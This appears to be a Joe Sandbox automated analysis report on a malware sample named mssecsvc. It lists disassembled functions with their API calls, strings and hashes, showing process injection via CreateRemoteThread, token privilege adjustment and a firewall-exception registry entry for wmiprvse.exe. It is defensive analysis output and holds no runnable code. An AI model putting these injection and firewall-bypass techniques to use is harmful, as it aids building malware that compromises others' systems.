String ID: \BaseNamedObjects\tghtVt
API String ID: 1950954290-4135269492
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 00AD2574 Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD252F: NtOpenSection.NTDLL(?,0000000E), ref: 00AD255E

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00AD25A4
CloseHandle.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00AD0815), ref: 00AD25AC

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: 7f1cd79f8d9aa3b0f2fc2bf06171cb60cb210e7a010042a9a4051dbb4f23c91e
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: 46213EB0300646BBEB24DF25DC56FA97369EFA0744F404119F81A8F2D4DBB1AE24C758

Function 00AD1422 Relevance: 3.0, APIs: 2, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AD145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AD146A

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: a37aca55b8afbb6b8d0cee772d19627416255012f83b142472a08d4b437a2e1f
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: a37aca55b8afbb6b8d0cee772d19627416255012f83b142472a08d4b437a2e1f
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 00AD2477 Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00AD249B
NtWriteVirtualMemory.NTDLL ref: 00AD24A4

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 00AD144A Relevance: 3.0, APIs: 2, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AD145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AD146A

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 7FE3663A Relevance: .0, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18debca8f2dd2d1ca2f8adb3937bfd968cff8255c5041bfcf825438cbb2dca55
Instruction ID: b3c3931d59951cba16578fa1cb639dee330ebfc20cf97616865c5810de1fbb65
Opcode Fuzzy Hash: 18debca8f2dd2d1ca2f8adb3937bfd968cff8255c5041bfcf825438cbb2dca55
Instruction Fuzzy Hash:

Function 00AD07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD144A: LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AD145A
Part of subcall function 00AD144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AD146A

CloseHandle.KERNELBASE(?), ref: 00AD05AD
FreeLibrary.KERNEL32(75670000,?,00AD079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD07B8
CloseHandle.KERNELBASE(?,?,00AD079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD07BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD07C9
Process32First.KERNEL32 ref: 00AD07DC
Process32Next.KERNEL32 ref: 00AD07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AD0842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD085D
CloseHandle.KERNEL32 ref: 00AD086C

Strings

csrs, xrefs: 00AD082C

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 5f2f39aa1cd2795fcfe2e506ebac48568c1ef95b4ea1cf308c17ff2844516835
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: 9C112E70501205BBEB255F21CD4DFBF3A6DEF44701F00002EF94B9A141C6B49B019A6A

Function 7FE34499 Relevance: 7.6, APIs: 5, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FE34406,?,7FE343E8,?,7FE343C4), ref: 7FE344A4
SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FE34406,?,7FE343E8,?,7FE343C4), ref: 7FE344B8
CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FE34406,?,7FE343E8,?,7FE343C4), ref: 7FE344ED
CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FE34565
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FE3459A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$MappingView
String ID:
API String ID: 1961427682-0
Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction ID: e73dce79f12e8b6eda5495139b91be11810b62e4260cc98f0af15d30b2f518a2
Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction Fuzzy Hash: 61213270A05309BFEF219E658D4DBBA367DAF00719F910229E91B9E090D7F0AF45C728

Function 00AD05BA Relevance: 1.3, APIs: 1, Instructions: 7
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(0000000A,00AD085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00AD05C1

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction ID: b5e8c8c165f064a2952de461f44a670bcd3012d8d746e1b14181ec4c74f28d58
Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction Fuzzy Hash: F9B0123824030095DA140910640DF443B347F01B11FE0405BEA074C1C407E507001C0D

Non-executed Functions

Function 00AD3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 00AD3CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 00AD3CD4
GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
GetTickCount.KERNEL32 ref: 00AD3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AD6EF6,00000000,00000000,00000000,00000000), ref: 00AD3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AD3EE2

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3CA0, 00AD3D06, 00AD3D16, 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1749273276-1603237609
Opcode ID: 3b3a8a3192dd475763d45222a96a185a3ef968de58b42c5bf8551b3c780efb2c
Instruction ID: a840923fb4f9b797f89e9ec815b68bb92010ae3e9a8f377fdae44797d3dfe380
Opcode Fuzzy Hash: 3b3a8a3192dd475763d45222a96a185a3ef968de58b42c5bf8551b3c780efb2c
Instruction Fuzzy Hash: A1020572418248BFEF319F248C4ABEA7BACEF45300F04451AE94A9E282D7F45F45C762

Function 7FE33C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE33CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE33CD4
GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
GetTickCount.KERNEL32 ref: 7FE33D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE36EF6,00000000,00000000,00000000,00000000), ref: 7FE33E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE33EE2

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33CA0, 7FE33D06, 7FE33D16, 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1749273276-1603237609
Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction ID: 6ea950373c88ff6d19942be58f69f6a79a8af6a3177b009621bc8366dda907a0
Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction Fuzzy Hash: F902F371909358BFEB229F248C4EBEA7BACEF41314F404519E84A9E081D7F46F45D7A2

Function 00AD3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00AD3CBA), ref: 00AD3CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 00AD3CD4
GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
GetTickCount.KERNEL32 ref: 00AD3D93

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3D16, 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2837544101-1603237609
Opcode ID: 9b70a38c1194afa68475894e3a227ac40eb20d30a27607f9878cba57f3019f6e
Instruction ID: 02e09b9482b05804180a81223ab0b5ab47a6d9f312e1534a8a9ac27e19c50007
Opcode Fuzzy Hash: 9b70a38c1194afa68475894e3a227ac40eb20d30a27607f9878cba57f3019f6e
Instruction Fuzzy Hash: 68E11472408258BFEF359F248C0ABEA7BACEF45300F04451AEC4A9E282D6F45F45C762

Function 7FE33CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE33CBA), ref: 7FE33CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE33CD4
GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
GetTickCount.KERNEL32 ref: 7FE33D93

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33D16, 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2837544101-1603237609
Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction ID: 412dcc43fa5b3a9f490de35ec05b951a66e951cd3606003aa13db7a26d7e3cfd
Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction Fuzzy Hash: E8E1F271909358BFEB229F608C4EBEA7BACEF41304F404559E84A9E081D6F46F05D7A2

Function 00AD3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00AD3CE5), ref: 00AD3CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 00AD3D07

Part of subcall function 00AD3D1F: lstrcat.KERNEL32(020a00 . . :#73204497e +*,00AD3D12), ref: 00AD3D20
Part of subcall function 00AD3D1F: GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
Part of subcall function 00AD3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
Part of subcall function 00AD3D1F: GetTickCount.KERNEL32 ref: 00AD3D93
Part of subcall function 00AD3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AD6EF6,00000000,00000000,00000000,00000000), ref: 00AD3E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3D06, 00AD3D16, 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 215653160-1603237609
Opcode ID: 158a8434471a8ffb3d7ae248ffa9ddca1129267620db11f9b1b166f622603453
Instruction ID: dda23f11dc64ff78c82173818eaaf1d325fff620170696acaaacbde7559aad15
Opcode Fuzzy Hash: 158a8434471a8ffb3d7ae248ffa9ddca1129267620db11f9b1b166f622603453
Instruction Fuzzy Hash: 54E1F272408248BFEF359F248C0ABEA7BACEF45300F04455AED4A9E282D6F45F45C766

Function 7FE33CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE33CE5), ref: 7FE33CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE33D07

Part of subcall function 7FE33D1F: lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE33D12), ref: 7FE33D20
Part of subcall function 7FE33D1F: GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
Part of subcall function 7FE33D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
Part of subcall function 7FE33D1F: GetTickCount.KERNEL32 ref: 7FE33D93
Part of subcall function 7FE33D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE36EF6,00000000,00000000,00000000,00000000), ref: 7FE33E65

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33D06, 7FE33D16, 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 215653160-1603237609
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: 1906664949ab5d7efdcb5d0e24206170f5ab5893216682b918c07ec9e1d589dc
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: 4DE1E271909358BFEB219F60CC4EBEA7BACEF41304F404659E94A9E081D6F46F05C7A5

Function 00AD3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#73204497e +*,00AD3D12), ref: 00AD3D20

Part of subcall function 00AD3D36: LoadLibraryA.KERNEL32(00AD3D2B), ref: 00AD3D36
Part of subcall function 00AD3D36: GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
Part of subcall function 00AD3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
Part of subcall function 00AD3D36: GetTickCount.KERNEL32 ref: 00AD3D93
Part of subcall function 00AD3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AD6EF6,00000000,00000000,00000000,00000000), ref: 00AD3E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3D1F, 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2038497427-1603237609
Opcode ID: 76485783ef1ebb789075038bc73b431c85142a4efb66d1d2d75da6d752c3c390
Instruction ID: f5afb07add4ad73c440ea712160fd2925d6f660e65bf754239c2b49ed8d8ccd4
Opcode Fuzzy Hash: 76485783ef1ebb789075038bc73b431c85142a4efb66d1d2d75da6d752c3c390
Instruction Fuzzy Hash: D3E1E172504258BFEF35AF248C0ABEA7BACEF45300F04455AEC4A9E282D6F45F45C766

Function 7FE33D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE33D12), ref: 7FE33D20

Part of subcall function 7FE33D36: LoadLibraryA.KERNEL32(7FE33D2B), ref: 7FE33D36
Part of subcall function 7FE33D36: GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
Part of subcall function 7FE33D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
Part of subcall function 7FE33D36: GetTickCount.KERNEL32 ref: 7FE33D93
Part of subcall function 7FE33D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE36EF6,00000000,00000000,00000000,00000000), ref: 7FE33E65

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33D1F, 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2038497427-1603237609
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: ee615c90e18cde76bc9d14ece342e8dba1a9f1ac5bbc43b99235a178c47350de
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
